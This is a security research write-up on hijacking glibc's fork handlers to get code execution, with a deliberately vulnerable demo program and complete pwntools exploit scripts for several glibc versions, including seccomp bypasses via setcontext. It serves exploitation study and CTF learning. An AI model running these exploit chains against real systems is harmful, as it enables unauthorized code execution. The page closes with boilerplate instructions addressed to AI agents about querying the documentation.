# fork\_gadget Some of you may be familiar with the exit handlers which are ran when calling `exit()`. These are typically used to clean up anything before the program is terminated, but they're also quite useful for attackers to hijack code execution. They're ideal, because by overwriting the [\_\_exit\_funcs](https://elixir.bootlin.com/glibc/glibc-2.35/source/stdlib/cxa_atexit.c#L76) array, you can specify functions to be called, along with a controlled argument. However, one downside is that, because they're popular for attackers, they employ pointer mangling on the function pointers. However there are other places where handlers like these are used, and one place I stumbled across when investigating the exit handlers, was the fork handlers, and after some investigation, I found some tricks to abuse the fork handlers to convert `fork` into a constraintless one gadget. ## Cheatsheet Below is a cheatsheet for all the tricks covered in this post: {% embed url="" %} ## What are the fork handlers? `fork` has its own handlers for multiple situations: * `prepare_handler` * `parent_handler` * `child_handler` These are stored in a single array/linked list called `fork_handlers`, which exists in a writable region of libc memory, so that more handlers can be added. In each case, all of the handlers of the corresponding type are executed in a specifc order. There are a few things that separate these from exit handlers: * :white\_check\_mark: No pointer mangling. * :x: No argument control. So 1 step forward, and 2 steps back. However, while we don't get explicit argument control like with exit handlers, there are similar tricks to what we did in [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md). To see that, let's have a closer look at `fork` across multiple versions, as the implementation of the handlers as changed, which also changes how we'd abuse them. {% file src="/files/Kf3ClPLgA37jFvEVIR3o" %} Files used for the demos {% endfile %} ## 2.28-2.35 (The specific version used here is `2.35`) Let's first have a look at what a `fork_handler` looks like:

* `prepare_handler`: Handlers to prepare the process to `fork`, so they're run *before* the `fork`. * `parent_handler`: Handlers run as the *parent* after the `fork`. * `child_handler`: Handlers run as the *child* after the `fork`. * `dso_handle`: A unique id to identify which binary/shared library registered this handler. These are stored in an array called `fork_handlers`, which is defined as:

The way this definition works is by stating a few "parameters" using macros, then including [malloc/dynarray-skeleton.c](https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/dynarray-skeleton.c), which then defines a struct called `fork_handler_list`, plus a bunch of handlers for this struct.

These `dynarray` structures are dynamically allocated arrays, which can resize if needed. Usually they have an initial buffer before it goes to the heap. Evaluating this yields: ```c struct fork_handler_list { size_t size; size_t allocated; struct fork_handler* array; struct fork_handler scratch[48]; }; ``` `fork` is defined as follows:

Here we call `__run_fork_handlers` with [atfork\_run\_prepare](https://elixir.bootlin.com/glibc/glibc-2.35/source/include/register-atfork.h#L37), indicating it wants to execute the `prepare` handlers.

So now it will go through the array from the last element (for backwards compatibility reasons), executing each `prepare_handler` if they exist. The methods `fork_handler_list_size` and `fork_handler_list_at` are some of methods automically defined when we defined `fork_handler_list`, which just index the array and get the length (`used`) respectively. Locking may also be used, if there are multiple threads running. ### So what? At first glance, taking control of code execution doesn't seem to be very doable, mainly due to the fact that we seemingly have no argument control. However, if we dig deeper, and look at the disassembly, we'll notice something interesting.

`__run_fork_handlers+288`: Locking `atfork_lock`

First it checks the first argument `edi`, and if it's `0`, then it means it should run the `prepare` handlers. Then checks if it should use locking, if so, jump to `+288`, where it will lock, then resume by jumping back to `+23`. But then something interesting happens. `[fork_handlers]` is loaded into `rbp` (which corresponds to `fork_handlers->used`), then is loaded into `rdi`. How interesting! It then goes on to call the `prepare_handler`:

`__run_fork_handlers+84`: Decrements `rbp` (the index)

`__run_fork_handlers+48`: Calls the `prepare_handler`

So theoretically, controlling the field `used` could grant us `rdi` control. ### Why does this happen? The reason for this is the [same reason](/pwn-notes/pwn/rop-2.34+/ret2gets.md#io_stdfile_0_lock-in-rdi) why [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md) works. Let's go back to `+84` (when the index is decremented):

`__run_fork_handlers+84`: Calling `__libc_dynarray_at_failure`?

`+91` checks the index `rbp` is within the bounds of the array (less than `used`). If it's not, then it goes on to call [\_\_libc\_dynarray\_at\_failure](https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/dynarray_at_failure.c#L23), interestingly setting a second argument, but not a first? Well that's because it already set the first argument: when `used` gets loaded. It could load `used` into any register, but chooses `rdi`, because in the case where this error happens, it doesn't need to waste time loading it into `rdi` again, because it's already there.

fork_handler_list_at: Checks the bounds, and calls the failure function with the size and index.

### Exploitation ```c #include #include #include #include void setup() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); } int main() { setup(); printf("%p\n", &fgets); printf("Enter address, size and data: "); unsigned long addr, size; scanf("%zu %zu ", &addr, &size); fgets((void*)addr, size, stdin); fork(); } ``` To demonstrate this, we'll use the ~~very realistic application~~ attack scenario above, where we have a libc leak, an arbitrary write, and a call to `fork` we want to hijack. We can start by writing some basic methods to create the structures: ```python def header(addr, size): return flat({ 0x00: size, # we don't need to control allocated 0x10: addr }) def handler_array(*funcs): assert funcs data = bytearray(0x20*len(funcs) - 0x18) for i, func in zip(range(0, len(data), 0x20), funcs[::-1]): data[i:i+8] = p64(func) return data ``` So we can use `handler_array(libc.sym.system)` to craft an array that will execute `system`, but we now need to control `rdi`. We can do this by setting `used` to some pointer to `/bin/sh`. However if we use a regular address to point to the handler array, then the large `used` field will cause it to access invalid memory, as it will access the last handler. So if we need `used` to be an address, why don't we just alter the address of the handler array. As long as ```c fork_handlers->array[fork_handlers->used-1] ``` points to our handler, then it'll work. We can forge such an address as follows: ```python addr = (addr - (size-len(funcs))*0x20) % (1<<64) ``` Of course this will create an "address" that's complete nonsense, but that doesn't matter, as it won't access the start of the array (unless [\_\_register\_atfork](https://elixir.bootlin.com/glibc/glibc-2.35/source/posix/register-atfork.c#L34) or [\_\_unregister\_atfork](https://elixir.bootlin.com/glibc/glibc-2.35/source/posix/register-atfork.c#L75) is used). Putting this all together, we can arrive at the following exploit: ```python #!/usr/bin/python3 from pwn import * e = context.binary = ELF('vuln') libc = ELF('libc', checksec=False) p = e.process() fgets = int(p.recvline(), 16) log.info(f"fgets: {hex(fgets)}") libc.address = fgets - libc.sym.fgets log.info(f"libc: {hex(libc.address)}") def header(addr, size): return flat({ 0x00: size, 0x10: addr }) def handler_array(*funcs): assert funcs data = bytearray(0x20*len(funcs) - 0x18) for i, func in zip(range(0, len(data), 0x20), funcs[::-1]): data[i:i+8] = p64(func) return data def forge_split(addr, *funcs, rdi=None): array = handler_array(*funcs) if rdi is not None: size = rdi assert size >= len(funcs) addr = (addr - (size-len(funcs))*0x20) % (1<<64) else: size = len(funcs) return header(addr, size), array def forge(addr, *funcs, rdi=None): hdr, arr = forge_split(addr+0x18, *funcs, rdi=rdi) return hdr + arr addr = libc.sym.fork_handlers data = forge(addr, libc.sym.system, rdi=next(libc.search(b"/bin/sh\x00"))) assert b"\n" not in data p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data) p.interactive() ``` ### Is that all we can do? This is the basic payload, but we can do more than just this. Take for example, a case where seccomp is in place, and we don't have access to `execve`, meaning calling `system` is useless now! Is that all we can do with a function call with a controlled argument? ~~Yes, thanks for reading.~~ This is where `setcontext` comes in! I covered this already [here](/pwn-notes/pwn/setcontext.md), but basically this allows us to get ROP through the use of a function resembling the `sigreturn` syscall. We can substitute this in as follows: ```python def setcontext(regs, addr): frame = SigreturnFrame() for reg, val in regs.items(): setattr(frame, reg, val) # needed to prevent SEGFAULT setattr(frame, "&fpstate", addr+0x1a8) fpstate = { 0x00: p16(0x37f), # cwd 0x02: p16(0xffff), # swd 0x04: p16(0x0), # ftw 0x06: p16(0xffff), # fop 0x08: 0xffffffff, # rip 0x10: 0x0, # rdp 0x18: 0x1f80, # mxcsr } return flat({ 0x00 : bytes(frame), # 0xf8: 0 # end of SigreturnFrame 0x128: 0, # uc_sigmask 0x1a8: fpstate, # fpstate }) addr = libc.sym.fork_handlers addr_ctx = addr+0x20 data = forge(addr, libc.sym.setcontext, rdi=addr_ctx) + setcontext({ "rdi": next(libc.search(b"/bin/sh\x00")), "rsi": 0, "rdx": 0, "rip": libc.sym.execve, "rsp": addr_ctx+0x200 }, addr_ctx) assert b"\n" not in data ``` For demo purposes, I'm just executing `execve`, but you can do much more with `setcontext`. ### gets Both of these examples require the `/bin/sh` string or the `SigreturnFrame` to already exist in memory, or be apart of the arbitrary write. But what if we don't have such a luxury? Well since `rdi` will be controlled for every function call, we can use `gets` to write data to the argument, before using it for `system`: ```python addr = libc.sym.fork_handlers data = forge(addr, libc.sym.gets, libc.sym.system, rdi=addr+0x200) assert b"\n" not in data # could also be any command we wish extra_data = b"/bin/sh" p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data) if extra_data: p.sendline(extra_data) p.interactive() ``` Or `setcontext`: ```python addr = libc.sym.fork_handlers addr_ctx = addr+0x20 data = forge(addr, libc.sym.gets, libc.sym.setcontext, rdi=addr_ctx) assert b"\n" not in data extra_data = setcontext({ "rdi": next(libc.search(b"/bin/sh\x00")), "rsi": 0, "rdx": 0, "rip": libc.sym.execve, "rsp": addr_ctx+0x200, }, addr_ctx) assert b"\n" not in extra_data p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data) if extra_data: p.sendline(extra_data) p.interactive() ``` ### Seccomp strikes back! Our good old ~~friend~~ enemy seccomp isn't always easily defeated by `setcontext`, because there's a nuisance I have yet to cover. If we have another look at `setcontext`:

`setcontext`: Calling `sigprocmask` syscall.

We see that it executes a syscall *before* it sets the context, with syscall number `0xe`. This is `sigprocmask`, and while it may not be on the radar of any blacklists, it could be easily left out of a whitelist (like `seccomp`'s strict mode), meaning this could invoke `seccomp`'s wrath. What if we tried to skip the syscall? It's a good suggestion, but a wrench in the plan here is the fact that it restores the pointer to the context in `rdx`, not `rdi`, so we'd need to control `rdx` somehow. Wouldn't it be nice if we could convert our current `rdi` control into `rdx` control, because `rdx` isn't used by `__run_fork_handlers`. Well it turns out there is a gadget that can do just that!

Exactly one in fact. However if you're anything like me (~~and I surely hope not~~), you'd wonder where this came from, and is this something that's likely to come up across multiple versions of libc, because it would be nice if our techniques were portable(ish).

It seems to belong to a function `__memset_erms`, which in hindsight makes sense. It explains the `rep stos` instruction: it's filling the buffer with the character `al`. And since `rep stos` increments `rdi`, it needs to save a copy, so that it can return that original pointer, as that's the [defined behaviour](https://man7.org/linux/man-pages/man3/memset.3.html#RETURN_VALUE) of `memset`. But why did it compile like this, and why is `rdx` used, surely this could change, right? Well let's find out:

Using `list` to find where it's defined.

Turns it the reason it compiled that way, is because that's exactly how libc wanted it: it used assembly language (`.S` is a common extension for assembly language files). From what I could see, this behaviour is also consistent across many versions, probably because there's no real reason to change it: * It's simple, so not much to change in the first place. * If it ain't broke, don't fix it. * It's not actually used, it's just used for performance measuring. Fantastic, we have a `mov rdx, rdi` gadget! But one final snag, we ideally want to set `rcx` or `rdx` to `0` before this gadget executes, so that `rep stos` finishes immediately (i.e. doesn't run).

Putting this all together, we arrive at the following: ```python addr = libc.sym.fork_handlers addr_ctx = addr+0x100 data = forge(addr, libc.sym.gets, libc.address+0xa85d8, libc.sym.__memset_erms+13, libc.sym.setcontext+45, rdi=addr_ctx) assert b"\n" not in data extra_data = setcontext({ "rdi": next(libc.search(b"/bin/sh\x00")), "rsi": 0, "rdx": 0, "rip": libc.sym.execve, "rsp": addr_ctx+0x200 }, addr_ctx) assert b"\n" not in extra_data p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data) p.sendline(extra_data) p.interactive() ``` ### 2.28-2.29 There's a weird edge case that I found with `2.28-2.29`, which seems to coincide with the versions that didn't have the `do_locking` argument (which was added in [2.30](https://elixir.bootlin.com/glibc/glibc-2.30/source/nptl/register-atfork.c#L110)).

Above we see that the `used` field is loaded into `rax`, but not into `rdi`. But after the first call:

`used` *is* loaded into `rdi`. Weird... I can't quite explain why this happens, but this is more just a word of warning, that this isn't an exact science. If you find this happening, you can always just start by doing a `ret` to get past the first call, which would also be compatible with `2.30+`. And if it doesn't happen at all? Well, `rdi` shouldn't be used by anything else if it's not used for `used`, so [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md) would also be a possibility, however I am yet to test it. ## 2.36+ (The specific version used here is `2.39`) You'll have noticed that the previous section was specifically for `2.28-2.35`. This is because the implementation of `fork_handlers` changes throughout the versions. So, what's changed now? Well, not much actually. Firstly, the `fork_handler` struct has a new field: `id`

And a separate function for running `prefork` handlers has been created:

The function for running `prefork` handlers isn't much different either:

The main addition is the use of `id`. What seems to be implied by the comments here, is that now each handler has a unique `id`, which increments each time a new one is added. This means ones added later will have a larger `id`. Due to the different locking pattern here, handlers could be de-registered and/or registered when a `prepare_handler` is being executed, so it ensures that only ones that were present before the current one was are executed, therefore skipping ones with a *higher* `id`. For us, all this changes is that the structure of `fork_handler` is different, and we just need to include an `id` field, where it's increasing with each handler. The updated handlers are as follows: ```python def header(addr, size): return flat({ 0x00: size, 0x10: addr }) def handler_array(*funcs): assert funcs data = bytearray(0x28*len(funcs)) for i, func in enumerate(funcs[::-1]): off = i*0x28 data[off:off+8] = p64(func) data[off+0x20:off+0x28] = p64(i) return data def forge_split(addr, *funcs, rdi=None): array = handler_array(*funcs) if rdi is not None: size = rdi assert size >= len(funcs) addr = (addr - (size-len(funcs))*0x28) % (1<<64) else: size = len(funcs) return header(addr, size), array def forge(addr, *funcs, rdi=None): hdr, arr = forge_split(addr+0x18, *funcs, rdi=rdi) return hdr + arr ``` ### Revenge of the seccomp! While these changes don't affect the regular cases for `system("/bin/sh")` or `setcontext`, it (indirectly) affects the `setcontext` case where we need to skip `sigprocmask`. In the version of glibc I used for the demo, `rdx` is used by `__run_prefork_handlers`:

Here we see at `+128` that `rdx=5*r14`, where `r14` is `sl` (the number of handlers). `rdx` then gets multiplied by `8`, which ultimately means `r14` got multiplied by `40`/`0x28`, (the size of `fork_handler`). This is in preparation for the loop where it checks the `id` fields, which is why it actually points to the previous handler's `id` field (`-0x30` instead of `-0x28`). In this case, we can actually set `used` to a value that, when multiplied by 5, points to a context. This will make `rdi` a junk value, which means you can't use `gets` to populate the context (RIP), but apart from that, it's no problem! ```python ret = ROP(libc).find_gadget(["ret"]).address addr = libc.sym.fork_handlers addr_ctx = addr+0x100 addr_ctx += (-addr_ctx) % 5 rdi = addr_ctx // 5 data = forge(addr, ret, libc.sym.setcontext+45, rdi=rdi) data = data.ljust(addr_ctx-addr, b"X") data += setcontext({ "rdi": next(libc.search(b"/bin/sh\x00")), "rsi": 0, "rdx": 0, "rip": libc.sym.execve, "rsp": addr_ctx+0x200 }, addr_ctx) assert b"\n" not in data p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data) p.interactive() ``` ## 2.27 and prior (The specific version used here is `2.27`) You may be wondering why I'm ending with the earliest implementation. This is because the later versions are more trivial, both in how `fork_handlers` is implemented, but also how they're exploited. This is because we no longer have the `rdi` control trick through the `used` field. `fork_handler` is now defined as:

A few more fields than before: * `next`: Points to next handler, as `__fork_handlers` is now a singly linked list. * `refcntr`: Reference count of this handler. * `need_signal`: Unused in `fork`, so we'll ignore it. We're no longer using a `dynarray`, so there is no `used` field to control to gain `rdi` control (cringe). Let's have a look at `fork` then:

Not much so far, it just checks `THREAD_SELF` for if the process is multi-threaded. There's also no function for handing the fork handlers anymore: it's incorporated into `fork` itself.

First it needs to access the root of the linked list of handlers: `__fork_handlers`. However since the process could be multi-threaded ~~and they didn't dicover locking yet~~ it needs to do it in a thread-safe way (hence the weirdness with `atomic_full_barrier` etc.) but the jist is that it will grab `__fork_handlers` if it exists, and (atomically) increment the `refcntr` to claim ownership of it, ensuring it doesn't get freed while it's in use here. {% hint style="info" %} A lock doesn't seem to be needed, as the `fork_handler` entries are constant (besides `refcntr`, which is handled atomically, therefore not susceptible to racing). While it does work, the code with locking is just nicer. {% endhint %}

__libc_fork: Executing `prepare_handler`'s

This now seems familiar, but instead of an accessing an array, it's cycling through a linked list. It also saves the handlers it uses, so that it can the same ones later for `parent_handler` and `child_handler`. To do this, it needs to claim ownership, so it increments the `refcntr`. Importantly, there's no function calls with arguments present here, except for [alloca](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/alloca.h#L35) (compiler builtin) and [atomic\_increment](https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/x86_64/atomic-machine.h#L282) (`asm` block). So unlike `2.28+`, there's no `rdi` control, because no functions (with a first argument) are called. We can write methods to forge a `fork_handler` list as follows: ```python def forge(addr, *funcs): assert funcs data = b"" for i, func in enumerate(funcs): next = addr+len(data)+0x30 data += flat({ 0x00: next if i==len(funcs)-1 else 0, 0x08: func, 0x28: p32(1), }, length=0x30) return data def forge_packed(addr, *funcs, smallest=False): assert funcs if smallest: # some refcntrs are outside our data # (except the first one, which we need to control) # these will be incremented, and potentially corrupt some memory # be careful when using this size = max(0x28+4, 0x10*len(funcs)) else: # all refcntrs are contained in our data size = 0x28 + 0x10*len(funcs) - 0xc data = bytearray(size) addrs = [addr+0x10*i for i in range(1, len(funcs))] + [0] for i, (addr, func) in enumerate(zip(addrs, funcs)): off = i*0x10 data[off:off+0x10] = p64(addr) + p64(func) for i in range(len(funcs)): off = 0x28 + 0x10*i if off+4 > len(data): break val = u32(bytes(data[off:off+4])) - 1 # the first refcntr must be non-zero # otherwise it'll loop forever if i == 0: assert val != 0 data[off:off+4] = p32(val % (1<<32)) return bytes(data) ``` You can do a standard array (`forge`), or you can utilise the unused space to pack it as much as possible (`forge_packed`). Both must contain at least the first `refcntr` though, as we need to ensure that that is non-zero. The rest of the `refcntr`'s will be incremented, and if these are outside our data, they *might* corrupt other data, but if that's not a concern, then you can use `smallest=True`. ### ret2rand Therefore the only way we can control `rdi` is through `prepare_handler` calls. We need a function that will populate `rdi` with some writable address, which we could then write to using `gets`. [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md) is unfortunately not very applicable here, as it's quite limited prior to `2.30` ([see here](https://sashactf.gitbook.io/pwn-notes/pwn/pages/pKfmKyEye0hMtzHAJiux#glibc-prior-to-2.30)). Thankfully, I was able to find an alternative: `rand`. [rand](https://linux.die.net/man/3/rand) is a psuedo random number generator, and with that comes the need to keep track of the random state. In this case, that state is [unsafe\_state](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L160), which is of type `random_state`:

This state is passed to `__random_r`, as the first argument :eyes:. What's more is that `__random_r` is relatively simple, doesn't make any function calls, or alter the pointer itself, which means that it can just keep `unsafe_state` in `rdi` (we'll look at this in a bit). #### But what about the locking? Well that's a good question, because we've seen before (in [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md#io_stdfile_0_lock-in-rdi)) that locking `lock` can result in `lock` being loaded into `rdi`.

Ah, it's our good ol' friend `lll_unlock`.

Just like in [ret2gets prior to 2.30](https://sashactf.gitbook.io/pwn-notes/pwn/pages/pKfmKyEye0hMtzHAJiux#glibc-prior-to-2.30), it only unlocks by using `lll_unlock_wait_private` when it's multi-threaded, thus the single thread case works flawlessly and doesn't touch `rdi`. The multi-threaded case is a bit more complex, but if it's locked with the value [LLL\_LOCK\_INITIALIZER\_LOCKED](https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/unix/sysv/linux/x86_64/lowlevellock.h#L57) (1), then it also doesn't touch `rdi` (yay). However, `lock` can also contain the value [LLL\_LOCK\_INITIALIZER\_WAITERS](https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/unix/sysv/linux/x86_64/lowlevellock.h#L58) (2), in which case the `dec` won't result in `0`, and will execute `lll_unlock_wait_private`, thus clobbering `rdi`. This should be unlikely to happen to `rand`'s [lock](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L197), as you'd need multiple threads trying to access `rand` at the same time, but it's not impossible, so be careful. #### Exploitation So let's go back to `random`, specifically `__random_r`. We can use `rand` followed by `gets` to write to the `unsafe_state`, but we'll need to call `rand` again to put `unsafe_state` back into `rdi` after `gets`. And if we call `rand` using a corrupted `unsafe_state`, then we could cause a crash? So we need to conform to `random_state`:

But this contains multiple pointers, including at the beginning, where we might want to put `/bin/sh` string for example! But are these always used? Let's check `__random_r`:

At first glance, we can see the `fptr`, `rptr`, `state` pointers being used in the `else` clause. However, there's an interesting case: `buf->rand_type == TYPE_0`. This seems to be much simpler, and doesn't use `fptr` or `rptr`! It does still use `state`, but as long as it's populated with a writable address, it won't `SEGFAULT`. The default `rand_type` is [TYPE\_3](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L119), but we can easily overwrite it to [TYPE\_0](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L101). Putting this together, we arrive at the following for `system("/bin/sh")`: ```python addr = libc.sym.__fork_handlers data = p64(addr+8) + forge_packed(addr+8, libc.sym.rand, libc.sym.gets, libc.sym.rand, libc.sym.system) assert b"\n" not in data extra_data = flat({ 0x00: b"/bin/sh\x00", 0x10: libc.sym.randtbl+4, # the previous `state` field 0x18: p32(0), # TYPE_0 }) assert b"\n" not in extra_data p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data) p.sendline(extra_data) p.interactive() ``` We're also able to use this for `setcontext`: ```python addr = libc.sym.__fork_handlers data = p64(addr+8) + forge_packed(addr+8, libc.sym.rand, libc.sym.gets, libc.sym.rand, libc.sym.setcontext) assert b"\n" not in data ucontext = setcontext({ "rdi": next(libc.search(b"/bin/sh\x00")), "rsi": 0, "rdx": 0, "rip": libc.sym.execve, "rsp": libc.sym.unsafe_state+0x200 }, libc.sym.unsafe_state) extra_data = flat({ 0x10: libc.sym.randtbl+4, 0x18: p32(0), # TYPE_0 }) extra_data += ucontext[len(extra_data):] assert b"\n" not in extra_data p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data) p.sendline(extra_data) p.interactive() ``` ### Return of the seccomp

This time our work is actually mostly done for us, because `2.27` and prior, `setcontext` doesn't use `rdx` for the `ucontext`.

So it's just as simple as jumping to `setcontext+37` (or later). ## Detecting arguments to handlers It can be quite cumbersome to check the disassembly to see what the arguments are going to be ahead of time. That's why I wrote a script, just like with [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md#detecting-this-behaviour), which will trace `fork` with `angr`, and log what the arguments to each call to `prepare_handler` were. {% embed url="" %} `detect_fork.py` {% endembed %} ## fork -> one\_gadget So why would we care about this? I mean sure, we can control `fork` to either execute `system` for a shell, or `setcontext` for ROP/shellcode, but that's only useful is there are calls to `fork`. Not all applications will use `fork` after all. What about functions in glibc? Surely some of them will use `fork`, after all there's functions like `system` which would create a new process to execute a shell command, right? Well unfortunately not many glibc functions use `__libc_fork`.

* [forkpty](https://elixir.bootlin.com/glibc/glibc-2.39/source/login/forkpty.c#L34) * [grantpt](https://elixir.bootlin.com/glibc/glibc-2.39/source/sysdeps/unix/grantpt.c#L207) * [daemon](https://elixir.bootlin.com/glibc/glibc-2.39/source/misc/daemon.c#L48) * [\_IO\_old\_popen](https://elixir.bootlin.com/glibc/glibc-2.39/source/libio/oldiopopen.c#L91) (not used) * [vfork](https://elixir.bootlin.com/glibc/glibc-2.39/source/posix/vfork.c#L26) (if the `vfork` syscall doesn't exist) The rest, like `system` or `popen` will use an inlined `clone` call.

Well, like I mentioned in the beginning, by overwriting `fork_handlers`, we effectively have turned `fork` into a `one_gadget`. However, this has a few benefits over a regular `one_gadget`: * No constraints. * Can trigger ROP. So if you have a function call primitive, and don't have strong argument control, but can use an arbitrary write, this may be useful. However, a lot of what's been done here can also be done with `exit`, and easier as well, as that has explicit argument control, the only downside there is that you have to deal with pointer mangling too. In conclusion, there may be some cases where this can be useful, but even if this is never used, I still think it was interesting, and I hope you did too :) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sashactf.gitbook.io/pwn-notes/pwn/fork_gadget.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.